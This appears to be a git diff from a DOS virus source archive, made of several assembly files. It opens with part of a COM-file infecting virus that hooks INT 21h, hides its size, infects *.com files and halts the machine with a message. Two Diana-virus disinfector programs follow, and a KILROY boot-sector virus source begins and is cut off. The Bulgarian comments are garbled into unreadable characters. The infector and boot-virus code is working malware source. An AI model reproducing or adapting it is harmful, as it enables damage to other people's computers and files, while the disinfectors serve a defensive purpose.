°¨ ²º°±¥­¥ ­  ¯º°¢¨ ¨ ¢²®°¨ ´ ©« + jz home ; ± ¶¥« ¯°¨ DIR ¤  ±ª°¨¢  ¢¨°³± . + cmp ah,12h ; + jz home + jmp int1hh + +home: call new21 ; °®¶¥¤³°  ª ²® ¯°¨ DIR ¯°®¢¥°¿¢  + push ax ; ¤ «¨ · ±  ¥ 10:26 ¨ , ª® ¥ §­ ·¨ + push bx ; ´ ©«  ¥ § ° §¥­ ¨ ¨§¢ ¦¤  ¤º«¦¨­ - + push es ; ²  ­  ¢¨°³±  ¤  ­¥ ±¥ § ¡¥«¿§¢  + ; ®£®«¥¬¿¢ ­¥²® ­  ´ ©« . + mov ah,2fh ; ‚§¥¬  DTA ¢ ES:BX . — ±  ¥ ¢ bx+1eh + call new21 ; ’³ª ¥ 10:26 ; + mov ax,534bh + cmp Word ptr es:[bx+1eh],ax + jnz ox + mov ax,End-Okey+3 + sub Word ptr es:[bx+24h],ax +ox: pop es ; €ª® ­¥ ¥ 10:26 , ²® §­ ·¨ ­¿¬ ¸ + pop bx ; ¢¨°³± ¨ ­¿¬  ¤  ­ ¬ «¨ · ±  ± + pop ax ; ­¥®¡µ®¤¨¬¨²¥ ¡ ©²®¢¥ ¨«¨ ¤º«- + db (0CAh) ; ¦¨­ ²  ­  ¢¨°³±  ¢ ±«³·¥¿. + dw (2) + + ;****************************************************; + ;* ‡   °   § ¿ ¢   ­ ¥ *; + ;****************************************************; + +mm: pushf + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH DS + PUSH ES + PUSH SI + PUSH DI + xor ax,ax + mov ds,ax + mov di,[0194h] + mov es,[0196h] + mov ax,[004ch] + mov bx,[004eh] + mov cx,0f000h + mov dx,0ec59h + mov [0100h],dx + mov [0102h],cx + mov [0198h],ax + mov [019ah],bx + mov [004ch],di + mov [004eh],es + mov ax,0a15h+new24-begin + push cs + pop ds + push cs + pop es + mov ah,2ch + call new21 + cmp cx,0200h + jna mm1 + mov ax,0003h + int 10h + mov ah,09h + mov dx,0a15h+n-begin + call new21 + cli + hlt + +dinge: jmp ding + +mm1: mov ah,2fh ;Dos service function ah=2FH (get DTA) + call new21 + mov cs:[8b0h],es + mov cs:[8b2h],bx + MOV AH,4eH + MOV DX,0a10h+files-okey + mov cx,0 + call new21 + jc dinge ;CX File attribute + ;DS:DX Pointer of filespec (ASCIIZ string) +vir: mov ax,534bh + cmp es:[bx+16h],ax + jnz fuck +vir1: mov ah,4fh + call new21 + jc enzi + jmp short vir +enzi: jmp ding +fuck: mov cx,1500 + cmp es:[bx+1ah],cx + jna vir1 +fuck1: push es + pop ds + mov ax,3d02h + mov dx,bx + add dx,1eh + call new21 + mov cs:[0a10h+handle-okey],ax + mov bx,ax + push cs + pop ds + mov ah,3fh + mov dx,0a10h + mov cx,5 + call new21 + mov di,0a10h+end-okey + mov al,0e9h + mov [di],al + inc di + mov bx,[8b2h] + mov cx,es:[bx+1ah] + inc cx + inc cx + mov [di],cx + inc di + inc di + mov ax,534bh + mov [di],ax + mov bx,cs:[0a10h+handle-okey] + mov ax,4200h + xor cx,cx + xor dx,dx + call new21 + mov ah,40h + mov dx,0a10h+end-okey + mov cx,5 + call new21 + mov ax,4202h + xor cx,cx + xor dx,dx + call new21 + push cs + pop ds + mov bx,cs:[0a10h+handle-okey] + mov ah,40h + mov dx,0a10h + mov cx,end-okey-3 + call new21 + mov bx,cs:[0a10h+handle-okey] + mov ax,5700h + call new21 + mov ax,5701h + mov cx,534bh + call new21 + mov ah,3eh + call new21 +ding: xor ax,ax + mov ds,ax + mov ax,[0198h] + mov bx,[019ah] + mov [004ch],ax + mov [004eh],bx + POP DI + POP SI + POP ES + POP DS + POP DX + POP CX + POP BX + POP AX + popf + +int1hh: jmp word ptr cs:[8c0h] ; °¥ªº±¢ ­¥ 21 + +files: db '*.com',0 ; ‡ ° §¿¢  ± ¬® COM ´ ©«®¢¥ + +new24: mov al,03 ; Int 24h ¤  ­¥ ¤ ¢  Write Protect + iret + +ding2: MOV AX,0070h ; ‚«¨§  ¢ ±¥£¬¥­ 0070h: ¨ ¯°¥²º°±¢  + MOV ES,AX ; §  ­¥®¡µ®¤¨¬¨²¥ ¡ ©²®¢¥ ­  INT13H + MOV DI,0000h + MOV AX,80FBh +non1: CLD + MOV CX,0FFFFh +non2: REPNZ SCASW + JZ non + MOV DI,0001h + JMP non1 +non: MOV BX,02FCh + CMP ES:[DI],BX + JNZ non2 + DEC DI + DEC DI + xor ax,ax ;  £« ±¿ ­®¢®²® ¯°¥ªº±¢ ­¥ INT13H ¨ + mov ds,ax ; ¨ ±¥ ¯®¤£®²¢¿ §  ° ¡®²  + mov [0194h],di + mov [0196h],es + mov es,[009eh] + mov bx,[00a0h] + push cs + pop ds + MOV BP,DS + pop si + push si ; °¥µ¢º°«¿ ¢¨°³±  ¢ ±²¥ª  ­  + MOV DI,0a10h ; COMMAND.COM + MOV CX,Handle-Okey ; € ±º¹® ² ª  ¨ ¯®¤£®²¢¿ + REP MOVSB ; ¢¨°³±  ¤®¡°¥ ¤  ±¥ ³ª°¥¯¨ + PUSH ES ; ¨ ®¯«¥²¥ ± Int 21h + LEA DI,[BX+1bh] + MOV AL,0e9h + STOSB + MOV AX,0A30h + SUB AX,DI + STOSW + MOV AX,9090H + STOSW + STOSW + MOV ES:[8c0h],DI + MOV AX,SS + SUB AX,0018h + CLI + MOV SS,AX + STI + MOV DS,BP + POP ES + pop si + pop cx + xor ax,ax + xor bx,bx + xor dx,dx + xor si,si + mov di,100h + push di + xor di,di + ret +n: db "K.I.I.S.ø ",024h ; ’®§¨ ²¥±² ±¥ ®²¯¥· ²¢  ±«¥¤ 2 · ± . +handle: dw ? ; € ±º¹® ² ª  ¡«®ª¨°  ª®¬¯¾²º° . +end: db (00) + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.kildia.asm b/MSDOS/Virus.MSDOS.Unknown.kildia.asm new file mode 100644 index 00000000..7b486ae8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kildia.asm @@ -0,0 +1,541 @@ + +memS equ 1 ;model small convertable to COM model +;**************** RUNTIME LIBRARY OF KILLDIANA.COM ************** +include lcmac.mac +calln macro name + call near ptr name + endm +callp macro name + lea dx,name + calln print + endm +callz macro name + push si + lea si,name + calln printz + pop si + endm + +dgroup group data,udata,xstack + assume ds:data + +pgroup group prog,tail +prog segment byte public 'prog' + assume cs:prog + + org 100h ;FOR MODEL COM + +start label far + cli + mov ax,offset pgroup:xtail ;get end of code group + add ax,16 ;calculate segment address of ds + mov cl,4 ;calculate segment address of ds + shr ax,cl ;calculate segment address of ds + mov bx,cs ;calculate segment address of ds + add ax,bx ;calculate segment address of ds + mov ds,ax ;set ds to dgroup + mov es,ax ;set es to dgroup + mov ss,ax ;set ss to dgroup + mov ds:_ss,ax ;save stack segment for (do,for,while) + mov sp,offset dgroup:sbase + 512 ;range of stack = 512 bytes + mov ds:_top,sp ;save stack pointer for (do,for,while) + mov bx,offset dgroup:sbase ;get stack segment for (do,for,while) + mov ds:_base,bx ;save stack segment for (do,for,while) + sti + mov ah,30h ;get dos version number + int 21h + mov ds:_dos,ax ;save dos version for (do,for,while) + callp copyr + callp tryrem + calln remove + callp weak + + lea di,fname + mov si,82h +getf: + mov al,cs:[si] + cmp al,0dh + je tonul + cmp al,' ' + jc blank + mov [di],al + inc di +blank: inc si + .br getf +tonul: clr al + mov [di],al + calln prefix + calln comwrk +; calln exewrk + mov ah,4ch + int 21h ;exit to DOS + +print proc near + mov ah,9 + int 21h + ret +print endp + +comwrk proc near + calln first + jc toret + calln workcom +ffnext: + calln fnext + jc toret + calln workcom + .br ffnext +toret: + ret +comwrk endp +fnext proc near + mov ah,4fh ;findnext + int 21h + jc ercc + jnc foundf +fnext endp +first proc near + lea dx,fname + mov cx,27h ;search all types of files + mov ah,4eh ;findfirst + int 21h + jnc foundf + callp notfnd +ercc: stc + ret +foundf: + calln konka + clc + ret +first endp +konka proc near + mov ah,2fh + int 21h ;get dta in es:bx + add bx,26 + mov ax,es:[bx] + mov llfil,ax ;save lowlengh + inc bx + inc bx + mov ax,es:[bx] + mov lhfil,ax ;save highlengh + inc bx + inc bx ;pointed to fname + lea si,ffname + lea di,fname + push es + push ds + pop es + mov cx,40h +repe cmpsb + pop es + dec si +copyf: mov al,es:[bx] + mov [si],al + inc si + inc bx + or al,al + jne copyf + ret +konka endp + +prefix proc near + lea si,fname + add si,40h + mov cx,40h + std +lodi: + lodsb + cmp al,'\' + je founds + cmp al,':' + je founds + loop lodi + mov nepar,offset fname + .br endcp +founds: + inc si + inc si + mov nepar,si + lea si,fname + lea di,ffname +cpag: + cmp si,nepar + jae endcp + mov al,[si] + mov [di],al + inc si + inc di + .br cpag +endcp: + cld + ret +prefix endp + + +remove proc near + push ds + clr ax + mov ds,ax + les bx,ds:[84h] ;21h vector + mov ax,cs + mov dx,es + cmp dx,ax + jc nodia + cmp bx,2eeh + jne nodia + + mov ax,es:[74fh] + mov ds:[84h],ax ;restore 21h + mov ax,es:[751h] + mov ds:[86h],ax + + mov ax,es:[74bh] + mov ds:[9ch],ax ;restore 27h + mov ax,es:[74dh] + mov ds:[9eh],ax + mov ax,es + mov bx,ax + dec ax + mov es,ax + mov es:byte ptr[0],5ah + mov es:word ptr[1],0 + pop ds + callp diakt + ret +nodia: + pop ds + callp dinakt + ret +remove endp + +workcom proc near + lea dx,ffname + mov ax,4300h ;get attrib + int 21h + jnc kopa + jmp retga +kopa: + mov al,cl + and al,0feh + cmp al,cl + je nochatr + + mov attr,cx + mov ax,4301h ;set attrib + clr cx ;to normal + int 21h + .br nochh +nochatr: + mov attr,0 +nochh: + mov ax,3d02h ;open file R/W + int 21h + jnc kop1 + jmp resatr +kop1: mov bx,ax + calln gettm + mov cx,18h + lea dx,bufer + mov ah,3fh ;read first 3 bytes + int 21h + jc closs2 + mov di,dx + mov ax,ds:[di] + cmp ax,5a4dh + jne commfil + push bx + calln exework + pop bx + jc chek2 + jmp closs + +commfil: + mov al,ds:[di] + cmp al,0e9h + je mak111 + jmp closs +mak111: mov si,ds:[di+1] ;relative offset + add si,3 + mov di,si + sub si,68h + mov len,si + + clr cx + mov dx,di + mov ax,4200h + int 21h ;seek to found e80000 +closs2: jc clos21 + + lea dx,bufer + add dx,18h+3 + mov cx,7 ;read 7 bytes + mov ah,3fh + int 21h ;read +clos21: jnc chek1 +chek2: jmp closs +chek1: + mov di,dx + cmp ds:byte ptr[di],0e8h + jne chek2 + cmp ds:word ptr[di+1],0 + jne chek2 + cmp ds:word ptr[di+4],0ee81h + jne chek2 + cmp ds:word ptr[di+6],6bh + jne chek2 + + clr cx + mov dx,si + add dx,705h + mov ax,4200h + int 21h ;seek to found org 3bytes + jc closs + lea dx,bufer + add dx,18h + mov cx,3 ;read 3 bytes + mov ah,3fh + int 21h ;read + jc closs + lea si,bufer +restor3: + mov al,[si+18h] + mov [si],al + inc si + loop restor3 + clr cx + clr dx + mov ax,4200h ;seek to begin + int 21h + jc closs + + mov cx,18h + lea dx,bufer + mov ah,40h ;write + int 21h + jc closs + + clr cx + mov dx,len + mov ax,4200h ;seek to end of real data + int 21h + jc resatr +exelen: + clr cx + mov ah,40h ;truncate file + int 21h + push bx + callp file + callz ffname + callp isok + + pop bx +closs: + calln settm + mov ah,3eh + int 21h ;close file + +resatr: + mov cx,attr ;to old attributes + or cx,cx + je retga + lea dx,ffname + mov ax,4301h ;set attrib + int 21h +retga: + ret +workcom endp +printz proc near +eter: mov ah,2 + lodsb + or al,al + je caret + mov dl,al + int 21h + .br eter +caret: + ret +printz endp + +gettm proc near + mov ax,5700h + int 21h + jc qget + mov atcx,cx + mov atdx,dx +qget: + ret +gettm endp + +settm proc near + mov ax,5701h + mov cx,atcx + mov dx,atdx + or cx,cx + je qset + or dx,dx + je qset + int 21h +qset: + ret +settm endp +exework proc near + mov ax,[di+16h] ;get main lenght in pargarphs + mov cx,16 + mul cx + push bx + mov bx,[di+8] + mov cl,4 + shl bx,cl + add ax,[di+14h] ;get IP + adc dx,0 + add ax,bx + adc dx,0 + pop bx + mov exhlen,dx + mov exllen,ax + mov cx,dx + mov dx,ax + mov ax,4200h + int 21h ;seek to begin Diana code + + lea dx,bufer + add dx,18h+3 + mov cx,7 ;read 7 bytes + mov ah,3fh + int 21h ;read + jc echek2 + mov di,dx + cmp ds:byte ptr[di],0e8h + jne echek2 + cmp ds:word ptr[di+1],0 + jne echek2 + cmp ds:word ptr[di+4],0ee81h + jne echek2 + cmp ds:word ptr[di+6],6bh + je exgoin +echek2: + stc + ret +exgoin: + sub exllen,68h + sbb exhlen,0 ;contains lenght of file + + mov dx,exllen + mov cx,exhlen + add dx,707h + adc cx,0 + mov ax,4200h + int 21h ;seek to old vectors + lea dx,bufer + add dx,26h + mov cx,1 + mov ah,3fh + int 21h ;read old cs:ip, ss:sp + jc echek2 + + mov dx,exllen + mov cx,exhlen + add dx,6fdh + adc cx,0 + mov ax,4200h + int 21h ;seek to old vectors + lea dx,bufer + add dx,18h + mov cx,8 + mov ah,3fh + int 21h ;read old cs:ip, ss:sp + jc echek2 + + mov ax,llfil + mov dx,lhfil + sub ax,exllen + sbb dx,exhlen + mov lhfil,dx + mov llfil,ax + lea di,bufer + mov ax,[di+4] + mov cx,512 + mul cx + add ax,[di+2] + adc dx,0 + sub ax,llfil + sbb dx,lhfil + div cx + mov cx,dx + mov dl,[di+26h] + sub cx,dx + mov rema,cx + mov [di+2],dx ;store remainder of lenght + mov [di+4],ax ;store /512 lenght + + mov ax,[di+18h] ;get ip + mov [di+14h],ax ;store + mov ax,[di+1ah] ;get cs: + mov [di+16h],ax ;store + + mov ax,[di+1ch] ;get sp + mov [di+10h],ax ;store + mov ax,[di+1eh] ;get ss: + mov [di+0eh],ax ;store + + clr cx + clr dx + mov ax,4200h + int 21h ;seek to prefix + mov cx,18h ;to write new prefix + lea dx,bufer + mov ah,40h + int 21h ;write 18h bytes prefix + mov cx,exhlen + mov dx,exllen + sub dx,rema + sbb cx,0 + mov ax,4200h + int 21h ;seek end of file + jmp exelen +exework endp + +prog ends + +tail segment word 'prog' ;help segment to allocate end of code +xtail dw -1 ;and set the data segment +tail ends + +data segment para public 'data' ;data segment + +fname db 40h dup(0) +ffname db 40h dup(0) +bufer db 27h dup(0) +_ss dw ? ;Lattice variables +_base dw ? ;Lattice variables +_dos dw ? ;Lattice variables +_top dw ? ;Lattice variables +nepar dw 0 +fhand dw 0 +exhlen dw 0 +exllen dw 0 +llfil dw 0 +lhfil dw 0 +len dw 0 +attr dw 0 +atcx dw 0 +atdx dw 0 +rema dw 0 +notfnd db 'File not found',13,10,'$' +copyr db 'Dianakiller program V1.0 (C)Copyright Deny_Soft 1989',13,10,'$' +tryrem db 'Searching Diana in memory...',13,10,'$' +diakt db 'Diana found',7,' and removed extra',13,10,'$' +dinakt db "Diana isn't active",13,10,"$" +weak db 'Searching for weak files...',13,10,'$' +file db 'File $' +isok db 9,9,' ... restored',13,10,'$' + +data ends + .pub <_ss,_base,_dos,_top> ;make external +udata segment public 'data' +udata ends +xstack segment 'data' +sbase dw 512 dup (?) +xstack ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.killeddi.asm b/MSDOS/Virus.MSDOS.Unknown.killeddi.asm new file mode 100644 index 00000000..b3701233 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.killeddi.asm @@ -0,0 +1,654 @@ + +memS equ 1 ;model small convertable to COM model +;**************** RUNTIME LIBRARY OF KILLDIANA.COM ************** +include lcmac.mac +calln macro name + call near ptr name + endm +callp macro name + lea dx,name + calln print + endm +callz macro name + push si + lea si,name + calln printz + pop si + endm + +dtas struc + resv db 21 dup(?) + atr db ? + hour dw ? + min dw ? + lfil dw ? + hfil dw ? + sname db 14 dup(?) +dtas ends + +dgroup group data,udata,xstack + assume ds:data + +pgroup group prog,tail +prog segment byte public 'prog' + assume cs:prog + + org 100h ;FOR MODEL COM + +start label far + cli + mov ax,offset pgroup:xtail ;get end of code group + add ax,16 ;calculate segment address of ds + mov cl,4 ;calculate segment address of ds + shr ax,cl ;calculate segment address of ds + mov bx,cs ;calculate segment address of ds + add ax,bx ;calculate segment address of ds + mov ds,ax ;set ds to dgroup + mov es,ax ;set es to dgroup + mov ss,ax ;set ss to dgroup + mov ds:_ss,ax ;save stack segment for (do,for,while) + mov sp,offset dgroup:sbase + 512 ;range of stack = 512 bytes + mov ds:_top,sp ;save stack pointer for (do,for,while) + mov bx,offset dgroup:sbase ;get stack segment for (do,for,while) + mov ds:_base,bx ;save stack segment for (do,for,while) + sti + mov ah,30h ;get dos version number + int 21h + mov ds:_dos,ax ;save dos version for (do,for,while) + callp copyr + callp tryrem + calln remove + push cs + pop es + + mov di,81h +getf: + mov cx,80 + cld + mov al,0dh +repne scasb + jne quiter + dec di + cmp di,81h + je quiter + mov si,di + mov cx,di + mov cs:byte ptr[di],0 +srcc: + dec si + mov al,cs:[si] + cmp al,'\' + je fndd + cmp al,':' + je fndd + cmp si,82h + jae srcc + dec si +fndd: + sub cx,si + jcxz quiter + lea di,fname + inc si +cpcp: mov al,cs:[si] + cmp al,' ' + jbe incsi + mov [di],al + inc di +incsi: + inc si + loop cpcp + callp weak + lea dx,root + mov ah,3bh ;chdir to root + int 21h ;chdir to root + calln findir +quiter: + mov ah,4ch + int 21h ;exit to DOS + +print proc near + mov ah,9 + int 21h + ret +print endp + +comwrk proc near + calln first + jc toret + calln workcom +ffnext: + calln fnext + jc toret + calln workcom + .br ffnext +toret: + ret +comwrk endp +fnext proc near + lea dx,mydta + mov ah,1ah + int 21h + mov ah,4fh ;findnext + int 21h + jc ercc + jnc foundf +fnext endp +first proc near + lea dx,mydta + mov ah,1ah + int 21h + lea dx,fname + mov cx,27h ;search all types of files + mov ah,4eh ;findfirst + int 21h + jnc foundf +; callp notfnd +ercc: stc + ret +foundf: + calln konka + clc + ret +first endp +konka proc near + mov ah,2fh + int 21h ;get dta in es:bx + add bx,26 + mov ax,es:[bx] + mov llfil,ax ;save lowlengh + inc bx + inc bx + mov ax,es:[bx] + mov lhfil,ax ;save highlengh + inc bx + inc bx ;pointed to fname + lea si,ffname +copyf: mov al,es:[bx] + mov [si],al + inc si + inc bx + or al,al + jne copyf + ret +konka endp + + + +remove proc near + push ds + clr ax + mov ds,ax + les bx,ds:[84h] ;21h vector + mov ax,cs + mov dx,es + cmp dx,ax + jc nodia + cmp bx,2eeh + jne nodia + + mov ax,es:[74fh] + mov ds:[84h],ax ;restore 21h + mov ax,es:[751h] + mov ds:[86h],ax + + mov ax,es:[74bh] + mov ds:[9ch],ax ;restore 27h + mov ax,es:[74dh] + mov ds:[9eh],ax + mov ax,es + mov bx,ax + dec ax + mov es,ax + mov es:byte ptr[0],5ah + mov es:word ptr[1],0 + pop ds + callp diakt + ret +nodia: + pop ds + callp dinakt + ret +remove endp + +workcom proc near + lea dx,ffname + mov ax,4300h ;get attrib + int 21h + jnc kopa + jmp retga +kopa: + mov al,cl + and al,0feh + cmp al,cl + je nochatr + + mov attr,cx + mov ax,4301h ;set attrib + clr cx ;to normal + int 21h + .br nochh +nochatr: + mov attr,0 +nochh: + mov ax,3d02h ;open file R/W + int 21h + jnc kop1 + jmp resatr +kop1: mov bx,ax + calln gettm + mov cx,18h + lea dx,bufer + mov ah,3fh ;read first 3 bytes + int 21h + jc closs2 + mov di,dx + mov ax,ds:[di] + cmp ax,5a4dh + jne commfil + push bx + calln exework + pop bx + jc chek2 + jmp closs + +commfil: + mov al,ds:[di] + cmp al,0e9h + je mak111 + jmp closs +mak111: mov si,ds:[di+1] ;relative offset + add si,3 + mov di,si + sub si,68h + mov len,si + + clr cx + mov dx,di + mov ax,4200h + int 21h ;seek to found e80000 +closs2: jc clos21 + + lea dx,bufer + add dx,18h+3 + mov cx,7 ;read 7 bytes + mov ah,3fh + int 21h ;read +clos21: jnc chek1 +chek2: jmp closs +chek1: + mov di,dx + cmp ds:byte ptr[di],0e8h + jne chek2 + cmp ds:word ptr[di+1],0 + jne chek2 + cmp ds:word ptr[di+4],0ee81h + jne chek2 + cmp ds:word ptr[di+6],6bh + jne chek2 + + clr cx + mov dx,si + add dx,705h + mov ax,4200h + int 21h ;seek to found org 3bytes + jc closs + lea dx,bufer + add dx,18h + mov cx,3 ;read 3 bytes + mov ah,3fh + int 21h ;read + jc closs + lea si,bufer +restor3: + mov al,[si+18h] + mov [si],al + inc si + loop restor3 + clr cx + clr dx + mov ax,4200h ;seek to begin + int 21h + jc closs + + mov cx,18h + lea dx,bufer + mov ah,40h ;write + int 21h + jc closs + + clr cx + mov dx,len + mov ax,4200h ;seek to end of real data + int 21h + jc resatr +exelen: + clr cx + mov ah,40h ;truncate file + int 21h + push bx + callp file + callz ffname + callp isok + + pop bx +closs: + calln settm + mov ah,3eh + int 21h ;close file + +resatr: + mov cx,attr ;to old attributes + or cx,cx + je retga + lea dx,ffname + mov ax,4301h ;set attrib + int 21h +retga: + ret +workcom endp +printz proc near +eter: mov ah,2 + lodsb + or al,al + je caret + mov dl,al + int 21h + .br eter +caret: + ret +printz endp + +gettm proc near + mov ax,5700h + int 21h + jc qget + mov atcx,cx + mov atdx,dx +qget: + ret +gettm endp + +settm proc near + mov ax,5701h + mov cx,atcx + mov dx,atdx + or cx,cx + je qset + or dx,dx + je qset + int 21h +qset: + ret +settm endp +exework proc near + mov ax,[di+16h] ;get main lenght in pargarphs + mov cx,16 + mul cx + push bx + mov bx,[di+8] + mov cl,4 + shl bx,cl + add ax,[di+14h] ;get IP + adc dx,0 + add ax,bx + adc dx,0 + pop bx + mov exhlen,dx + mov exllen,ax + mov cx,dx + mov dx,ax + mov ax,4200h + int 21h ;seek to begin Diana code + + lea dx,bufer + add dx,18h+3 + mov cx,7 ;read 7 bytes + mov ah,3fh + int 21h ;read + jc echek2 + mov di,dx + cmp ds:byte ptr[di],0e8h + jne echek2 + cmp ds:word ptr[di+1],0 + jne echek2 + cmp ds:word ptr[di+4],0ee81h + jne echek2 + cmp ds:word ptr[di+6],6bh + je exgoin +echek2: + stc + ret +exgoin: + sub exllen,68h + sbb exhlen,0 ;contains lenght of file + + mov dx,exllen + mov cx,exhlen + add dx,707h + adc cx,0 + mov ax,4200h + int 21h ;seek to old vectors + lea dx,bufer + add dx,26h + mov cx,1 + mov ah,3fh + int 21h ;read old cs:ip, ss:sp + jc echek2 + + mov dx,exllen + mov cx,exhlen + add dx,6fdh + adc cx,0 + mov ax,4200h + int 21h ;seek to old vectors + lea dx,bufer + add dx,18h + mov cx,8 + mov ah,3fh + int 21h ;read old cs:ip, ss:sp + jc echek2 + + mov ax,llfil + mov dx,lhfil + sub ax,exllen + sbb dx,exhlen + mov lhfil,dx + mov llfil,ax + lea di,bufer + mov ax,[di+4] + mov cx,512 + mul cx + add ax,[di+2] + adc dx,0 + sub ax,llfil + sbb dx,lhfil + div cx + mov cx,dx + mov dl,[di+26h] + sub cx,dx + mov rema,cx + mov [di+2],dx ;store remainder of lenght + mov [di+4],ax ;store /512 lenght + + mov ax,[di+18h] ;get ip + mov [di+14h],ax ;store + mov ax,[di+1ah] ;get cs: + mov [di+16h],ax ;store + + mov ax,[di+1ch] ;get sp + mov [di+10h],ax ;store + mov ax,[di+1eh] ;get ss: + mov [di+0eh],ax ;store + + clr cx + clr dx + mov ax,4200h + int 21h ;seek to prefix + mov cx,18h ;to write new prefix + lea dx,bufer + mov ah,40h + int 21h ;write 18h bytes prefix + mov cx,exhlen + mov dx,exllen + sub dx,rema + sbb cx,0 + mov ax,4200h + int 21h ;seek end of file + jmp exelen +exework endp + +findir proc near + ; get dta + mov ah,2fh + int 21h + mov word ptr olddta[0],bx + mov word ptr olddta[2],es + ;***** + lea dx,mydta + mov ah,1ah + int 21h + calln comwrk + mov word ptr fflag,0 + calln basewr + + ; restore dta + push ds + lds dx,olddta + mov ah,1ah + int 21h + pop ds + ret +findir endp + +basewr proc near + cmp word ptr fflag,0 + jne nnextt + calln fdir + jc baret + jnc checkk +nnextt: + calln ndir + jc baret +checkk: + mov bx,odta + test ds:byte ptr[bx + dtas.atr],10h + je nnextt + cmp byte ptr dtas.sname[bx],'.' + je nnextt + mov ah,3bh ;chdir + mov dx,offset dtas.sname + add dx,bx + int 21h ;chdir + calln pdir + calln comwrk + mov fflag,0 + inc coudir + calln basewr +bare: + pushf + lea dx,point + mov ah,3bh ;chdir up + int 21h ;chdir up + dec coudir + jns nosig + mov coudir,0 +nosig: + mov fflag,1 + popf + .br nnextt + +baret: + ret +basewr endp +ndir proc near + calln stdta + mov ah,4fh + int 21h + ret +ndir endp +fdir proc near + calln stdta + lea dx,aster + mov cx,37h + mov ah,4eh + int 21h + ret +fdir endp +stdta proc near + mov ax,44 + mul word ptr coudir + add ax,offset dtatab + mov odta,ax + mov dx,ax + mov ah,1ah + int 21h + ret +stdta endp +pdir proc near + push si + lea si,curdir + clr dl + mov ah,47h + int 21h + lea si,curdir + calln printz + callp carret + pop si + ret +pdir endp +prog ends + +tail segment word 'prog' ;help segment to allocate end of code +xtail dw -1 ;and set the data segment +tail ends + +data segment para public 'data' ;data segment + + +fname db 10h dup(0) +ffname db 10h dup(0) +mydta db 48 dup(?) +bufer db 28h dup(0) +dtatab dtas 12 dup(<>) +curdir db 64 dup(?) +_ss dw ? ;Lattice variables +_base dw ? ;Lattice variables +_dos dw ? ;Lattice variables +_top dw ? ;Lattice variables +odta dw 0 +olddta dd 0 +nepar dw 0 +fhand dw 0 +exhlen dw 0 +exllen dw 0 +llfil dw 0 +lhfil dw 0 +len dw 0 +attr dw 0 +atcx dw 0 +atdx dw 0 +rema dw 0 +coudir dw 0 +fflag dw 0 +;notfnd db 'File not found',13,10,'$' +copyr db 'Dianakiller program V1.1 (C)Copyright Deny_Soft 1989',13,10,'$' +tryrem db 'Searching Diana in memory..',13,10,'$' +diakt db 'Diana found',7,' and removed extra',13,10,'$' +dinakt db "Diana isn't active",13,10,"$" +weak db 'Searching for weak files...',13,10,'$' +file db 'File $' +isok db 9,9,' ... restored',13,10,'$' +carret db 13,10,'$' +aster db '*.*',0 +point db '..',0 +root db '\',0 + +data ends + .pub <_ss,_base,_dos,_top> ;make external +udata segment public 'data' +udata ends +xstack segment 'data' +sbase dw 512 dup (?) +xstack ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.kilroy.asm b/MSDOS/Virus.MSDOS.Unknown.kilroy.asm new file mode 100644 index 00000000..f7b58cb0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kilroy.asm @@ -0,0 +1,315 @@ +;The KILROY one-sector boot sector virus will both boot up either MS-DOS or +;PC-DOS and it will infect other disks. + +;This segment is where the first operating system file (IBMBIO.COM or IO.SYS) +;will be loaded and executed from. We don't know (or care) what is there, but +;we do need the address to jump to defined in a separate segment so we can +;execute a far jump to it. +DOS_LOAD SEGMENT AT 0070H + ASSUME CS:DOS_LOAD + + ORG 0 + +LOAD: DB 0 ;Start of the first operating system program + +DOS_LOAD ENDS + + +MAIN SEGMENT BYTE + ASSUME CS:MAIN,DS:MAIN,SS:NOTHING + +;This jump instruction is just here so we can compile this program as a COM +;file. It is never actually executed, and never becomes a part of the boot +;sector. Only the 512 bytes after the address 7C00 in this file become part of +;the boot sector. + ORG 100H + +START: jmp BOOTSEC + +;The following two definitions are BIOS RAM bytes which contain information +;about the number and type of disk drives in the computer. These are needed by +;the virus to decide on where to look to find drives to infect. They are not +;normally needed by an ordinary boot sector. + + ORG 0410H + +SYSTEM_INFO: DB ? ;System info byte: Take bits 6 & 7 and add 1 to get number of + ;disk drives on this system (eg 01 = 2 drives) + + ORG 0475H + +HD_COUNT: DB ? ;Number of hard drives in the system + +;This area is reserved for loading the boot sector from the disk which is going +;to be infected, as well as the first sector of the root directory, when +;checking for the existence of system files and loading the first system file. + + ORG 0500H + +DISK_BUF: DW ? ;Start of the buffer + + ORG 06FEH + +NEW_ID: DW ? ;Location of AA55H in boot sector loaded at DISK_BUF + +;Here is the start of the boot sector code. This is the chunk we will take out +;of the compiled COM file and put it in the first sector on a 360K floppy disk. +;Note that this MUST be loaded onto a 360K floppy to work, because the +;parameters in the data area that follow are set up to work only with a 360K +;disk! + + ORG 7C00H + +BOOTSEC: JMP BOOT ;Jump to start of boot sector code + + ORG 7C03H ;This is needed because the jump will get coded as 2 bytes + +DOS_ID: DB 'KILROY ' ;Name of this boot sector (8 bytes) +SEC_SIZE: DW 200H ;Size of a sector, in bytes +SECS_PER_CLUST: DB 02 ;Number of sectors in a cluster +FAT_START: DW 1 ;Starting sector for the first File Allocation Table (FAT) +FAT_COUNT: DB 2 ;Number of FATs on this disk +ROOT_ENTRIES: DW 70H ;Number of root directory entries +SEC_COUNT: DW 2D0H ;Total number of sectors on this disk +DISK_ID: DB 0FDH ;Disk type code (This is 360KB) +SECS_PER_FAT: DW 2 ;Number of sectors per FAT +SECS_PER_TRK: DW 9 ;Sectors per track for this drive +HEADS: DW 2 ;Number of heads (sides) on this drive +HIDDEN_SECS: DW 0 ;Number of hidden sectors on the disk + +DSKBASETBL: + DB 0 ;Specify byte 1: step rate time, head unload time + DB 0 ;Specify byte 2: Head load time, DMA mode + DB 0 ;Wait time until motor turned off, in clock ticks + DB 0 ;Bytes per sector (0=128, 1=256, 2=512, 3=1024) + DB 12H ;Last sector number (we make it large enough to handle 1.2/1.44 MB floppies) + DB 0 ;Gap length between sectors for r/w operations, in bytes + DB 0 ;Data transfer length when sector length not specified + DB 0 ;Gap length between sectors for format operations, in bytes + DB 0 ;Value stored in newly formatted sectors + DB 1 ;Head settle time, in milliseconds (we set it small to speed operations) + DB 0 ;Motor startup time, 